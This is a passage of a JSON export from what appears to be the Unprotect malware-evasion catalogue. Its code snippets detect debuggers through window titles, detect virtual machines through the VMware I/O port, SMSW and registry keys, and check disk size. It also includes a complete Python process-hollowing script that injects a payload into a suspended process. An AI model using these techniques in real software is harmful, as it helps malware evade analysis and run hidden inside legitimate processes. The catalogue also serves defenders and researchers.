then\r\n    Exit();\r\n\r\n  SetLength(AWindowName, AMaxCount); // Other technique instead of using GetMem / FreeMem a new Pointer.\r\n  try\r\n      if (GetWindowTextW(AHandle, PWideChar(AWindowName), AMaxCount) = 0) then\r\n        Exit();\r\n      ///\r\n\r\n      AOldLen := Length(AWindowName);\r\n\r\n      for AKey {Description} in LEnumWindowsSignatures.keys do 
begin\r\n        if NOT LEnumWindowsSignatures.TryGetValue(AKey, APattern) then\r\n          continue;\r\n\r\n        AWindowName := StringReplace(AWindowName, APattern, '', []);\r\n\r\n        if (Length(AWindowName) <> AOldLen) then begin\r\n          Found(AKey, AHandle);\r\n\r\n          break;\r\n        end;\r\n      end;\r\n  finally\r\n    SetLength(AWindowName, 0);\r\n  end;\r\nend;\r\n\r\nfunction Locate_EnumWindows() : Boolean;\r\nbegin\r\n  EnumWindows(@EnumWindowProc, 0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Append FindWindow Technique Signature\r\n-------------------------------------------------------------------------------}\r\nprocedure AppendFindWindowSignature(ADescription, AClassName, AWindowName : String);\r\nvar AFindWindowSignature : TFindWindowSignature;\r\nbegin\r\n  if NOT Assigned(LFindWindowSignatures) then\r\n    Exit();\r\n  ///\r\n\r\n  AFindWindowSignature := TFindWindowSignature.Create(ADescription, AClassName, AWindowName);\r\n\r\n  LFindWindowSignatures.Add(AFindWindowSignature);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LFindWindowSignatures := TObjectList<TFindWindowSignature>.Create();\r\n    LEnumWindowsSignatures := TDictionary<String, String>.Create();\r\n    try\r\n      {\r\n        Configure debuggers signatures here for FindWindow API technique.\r\n      }\r\n      AppendFindWindowSignature('OllyDbg', 'OLLYDBG', '');\r\n      AppendFindWindowSignature('x64dbg (x64)', '', 'x64dbg');\r\n      AppendFindWindowSignature('x32dbg (x32)', '', 'x32dbg');\r\n\r\n      // ...\r\n      // AppendFindWindowSignature('...', '...', '...');\r\n      // ...\r\n\r\n      {\r\n        Configure debuggeers signatures here for EnumWindows API technique.\r\n      }\r\n      
LEnumWindowsSignatures.Add('Immunity Debugger', 'Immunity Debugger');\r\n\r\n      // ...\r\n      // AEnumWindowsSignatures.Add('...', '...');\r\n      // ...\r\n\r\n      {\r\n        Fire !!!\r\n      }\r\n      Locate_FindWindow();\r\n      Locate_EnumWindows();\r\n\r\n      readln;\r\n    finally\r\n      if Assigned(LFindWindowSignatures) then\r\n        FreeAndNil(LFindWindowSignatures);\r\n\r\n      if Assigned(LEnumWindowsSignatures) then\r\n        FreeAndNil(LEnumWindowsSignatures);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\n\r\nend."
        },
        {
            "id": 7,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/19/?format=api",
            "description": "",
            "plain_code": "#include <iostream>\r\n\r\nusing namespace std;\r\n\r\nvoid smsw()\r\n{\r\n\tunsigned int reax = 0;\r\n\r\n\t__asm\r\n\t{\r\n\t\tmov eax, 0xCCCCCCCC\r\n\t\tsmsw eax\r\n\t\tmov DWORD PTR[reax], eax\r\n\t}\r\n\r\n\tif ((((reax >> 24) & 0xFF) == 0xcc) && (((reax >> 16) & 0xFF) == 0xcc))\r\n\t{\r\n\t    cout << \"VM detected!\" << endl;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n    smsw();\r\n    cout << \"Hello world!\" << endl;\r\n    return 0;\r\n}"
        },
        {
            "id": 8,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/7/?format=api",
            "description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5",
            "plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int    a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result  : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result  : Not Detected\\n\\n\");\r\n}"
        },
        {
            "id": 6,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/34/?format=api",
            "description": "Python snippet to detect the drive size with `GetDiskFreeSpaceExW`",
            "plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n    if size_bytes == 0:\r\n        return \"0B\"\r\n    size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n    i = int(math.floor(math.log(size_bytes, 1024)))\r\n    p = math.pow(1024, i)\r\n    s = round(size_bytes / p, 2)\r\n    return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n    PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n    kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n    _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n    success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n    size = convert_size(total.value)\r\n    print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n    disk_size(\"C:/\")"
        },
        {
            "id": 4,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/12/?format=api",
            "description": "This is a snippet to detect the most common registry keys created by virtual machines.",
            "plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, &regkey))\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n\t}\r\n\r\n    else\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n    }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n    HKEY hKey;\r\n\r\n    // list of registry key related virutal machines\r\n    LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n                               \"HARDWARE\\\\Description\\\\System\",\r\n                               \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n                               \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n                               
\"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n                               \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n                               };\r\n\r\n\r\n    for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n    {\r\n\r\n        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n        {\r\n            cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n\r\n    }\r\n\r\n    // Check for registry Value\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n    
reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n    RegistryArtifacts();\r\n    return 0;\r\n}"
        },
        {
            "id": 5,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/67/?format=api",
            "description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search for known debuggers.",
            "plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n                            LPWSTR, INT, MAX_PATH,\\\r\n                            LPDWORD, DWORD, HANDLE,\\\r\n                            HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n    \"\"\"\r\n    When a Window handle is found it will output to console several information about spotted process.\r\n    :param description: Description of found object.\r\n    :param hwnd: Handle of found object.\r\n    \"\"\"\r\n    lpdwProcessId = ctypes.c_ulong()\r\n\r\n    output = \"-\" * 60 + \"\\r\\n\"\r\n    output += description + \"\\r\\n\"\r\n    output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n    output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n    _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n    if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n        PROCESS_QUERY_INFORMATION = 0x0400\r\n        PROCESS_VM_READ = 0x0010\r\n\r\n        procHandle = ctypes.windll.kernel32.OpenProcess(\r\n            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n            False,\r\n            lpdwProcessId.value\r\n        )\r\n\r\n        if procHandle > 0:\r\n            output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n            lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n            if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n                path, process_name = os.path.split(lpFilename.value)\r\n\r\n                output += f\"Process Name: {process_name}\\r\\n\"\r\n                output += f\"Image Path: {path}\\r\\n\"\r\n\r\n            ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n    output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n    print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n    \"\"\"\r\n    EnumWindows API CallBack\r\n    :param hwnd: Current Window Handle\r\n    :param lparam: Not used in our case\r\n    :return: Always True in our 
case\r\n    \"\"\"\r\n    if hwnd > 0:\r\n        nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n        if nMaxCount > 0:\r\n            lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n            if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n                for description, in_title in contains_in_title:\r\n                    if in_title in lpWindowName.value:\r\n                        found(description, hwnd)\r\n\r\n    return True\r\n\r\n\r\nif __name__ == '__main__':\r\n    '''\r\n        Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n    '''\r\n    fw_debuggers = [\r\n        (\"OllyDbg\", \"OLLYDBG\", None),\r\n        (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n        (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n        # ......... #\r\n    ]\r\n\r\n    '''\r\n        Description | Text contained in debugger title.\r\n    '''\r\n    contains_in_title = [\r\n        (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n        # ......... 
#\r\n    ]\r\n\r\n    # Define GetWindowThreadProcessId API\r\n    _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n    _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n    _GetWindowThreadProcessId.restype = DWORD\r\n\r\n    # Define GetModuleFileNameEx API\r\n    _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n    _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n    _GetModuleFileNameEx.restype = DWORD\r\n\r\n    '''\r\n        Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n    '''\r\n    for description, lpClassName, lpWindowName in fw_debuggers:\r\n        handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n        if handle > 0:\r\n            found(description, handle)\r\n\r\n    '''\r\n        Search for Debuggers using EnumWindows API.\r\n        We first list all Windows titles then search for a debugger title pattern.\r\n        This is useful against debuggers or tools without specific title / classname. \r\n    '''\r\n\r\n    # Define EnumWindows API\r\n    lpEnumFunc = ctypes.WINFUNCTYPE(\r\n        BOOL,\r\n        HWND,\r\n        LPARAM\r\n    )\r\n\r\n    _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n    _EnumWindows.argtypes = [\r\n        lpEnumFunc,\r\n        LPARAM\r\n    ]\r\n\r\n    # Define GetWindowTextW API\r\n    _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n    _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n    _GetWindowText.restype = INT\r\n\r\n    # Enumerate Windows through Windows API\r\n    _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
        },
        {
            "id": 3,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/88/?format=api",
            "description": "",
            "plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n        print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n        sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n                ('hProcess', c_void_p), \r\n                ('hThread', c_void_p), \r\n                ('dwProcessId', c_ulong), \r\n                ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n                ('cb', c_ulong), \r\n                ('lpReserved', c_char_p),    \r\n                ('lpDesktop', c_char_p),\r\n                ('lpTitle', c_char_p),\r\n                ('dwX', c_ulong),\r\n                ('dwY', c_ulong),\r\n                ('dwXSize', c_ulong),\r\n                ('dwYSize', c_ulong),\r\n                ('dwXCountChars', c_ulong),\r\n                ('dwYCountChars', c_ulong),\r\n                ('dwFillAttribute', c_ulong),\r\n                ('dwFlags', c_ulong),\r\n                ('wShowWindow', c_ushort),\r\n                ('cbReserved2', c_ushort),\r\n                ('lpReserved2', c_ulong),    \r\n                ('hStdInput', c_void_p),\r\n                ('hStdOutput', c_void_p),\r\n                ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n                (\"ControlWord\", c_ulong),\r\n                (\"StatusWord\", c_ulong),\r\n                (\"TagWord\", c_ulong),\r\n                (\"ErrorOffset\", c_ulong),\r\n                (\"ErrorSelector\", c_ulong),\r\n                (\"DataOffset\", c_ulong),\r\n                (\"DataSelector\", c_ulong),\r\n                (\"RegisterArea\", c_ubyte * 80),\r\n                (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n        _fields_ = 
[\r\n                (\"ContextFlags\", c_ulong),\r\n                (\"Dr0\", c_ulong),\r\n                (\"Dr1\", c_ulong),\r\n                (\"Dr2\", c_ulong),\r\n                (\"Dr3\", c_ulong),\r\n                (\"Dr6\", c_ulong),\r\n                (\"Dr7\", c_ulong),\r\n                (\"FloatSave\", FLOATING_SAVE_AREA),\r\n                (\"SegGs\", c_ulong),\r\n                (\"SegFs\", c_ulong),\r\n                (\"SegEs\", c_ulong),\r\n                (\"SegDs\", c_ulong),\r\n                (\"Edi\", c_ulong),\r\n                (\"Esi\", c_ulong),\r\n                (\"Ebx\", c_ulong),\r\n                (\"Edx\", c_ulong),\r\n                (\"Ecx\", c_ulong),\r\n                (\"Eax\", c_ulong),\r\n                (\"Ebp\", c_ulong),\r\n                (\"Eip\", c_ulong),\r\n                (\"SegCs\", c_ulong),\r\n                (\"EFlags\", c_ulong),\r\n                (\"Esp\", c_ulong),\r\n                (\"SegSs\", c_ulong),\r\n                (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n        print \"[!]Error: \" + FormatError(GetLastError())\r\n        print \"[!]Exiting\"\r\n        print \"[!]The process may still be running\"\r\n        sys.exit()\r\n        \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n                                None,\r\n                                target_exe,\r\n                                None,\r\n                                None,\r\n                                False,\r\n                                CREATE_SUSPENDED,\r\n                                None,\r\n                                None,\r\n                                byref(startupinfo),\r\n                                byref(processinfo)) == 0:\r\n       error()\r\n 
       \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n                                c_int(payload_size+1),\r\n                                MEM_COMMIT | MEM_RESERVE,\r\n                                PAGE_READWRITE)\r\n\r\n\r\nmemmove(                        payload_data_pointer,\r\n                                payload_data,\r\n                                payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n       
  error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress ==  payload_ImageBase:\r\n        if not windll.ntdll.NtUnmapViewOfSection(\r\n                                hProcess,\r\n                                target_ImageBase):\r\n                error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n                                hProcess, \r\n                                c_char_p(payload_ImageBase), \r\n                                c_int(payload_SizeOfImage), \r\n                                MEM_COMMIT|MEM_RESERVE, \r\n                                PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n        error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(payload_ImageBase),\r\n                                c_char_p(payload_data_pointer),\r\n                                c_int(payload_SizeOfHeaders),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + 
str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n        section = payload_sections[i]\r\n        dst = payload_ImageBase + section.VirtualAddress\r\n        src = payload_data_pointer + section.PointerToRawData\r\n        size = section.SizeOfRawData\r\n        print\r\n        print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n        stepcount += 1\r\n        print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n        print \"\\t[+]Writing to: \" + str(hex(dst))\r\n        print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n        lpNumberOfBytesWritten  = c_size_t(0)\r\n\r\n        if windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(dst),\r\n                                c_char_p(src),\r\n                                c_int(size),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                 error()\r\n                 \r\n        print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n         \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten  = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(cx.Ebx+8),\r\n                                c_char_p(payload_data_pointer+0x11C),\r\n                                c_int(4),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n         error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 
1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n                                hThread,\r\n                                byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n        error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
        },
        {
            "id": 1,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/61/?format=api",
            "description": "",
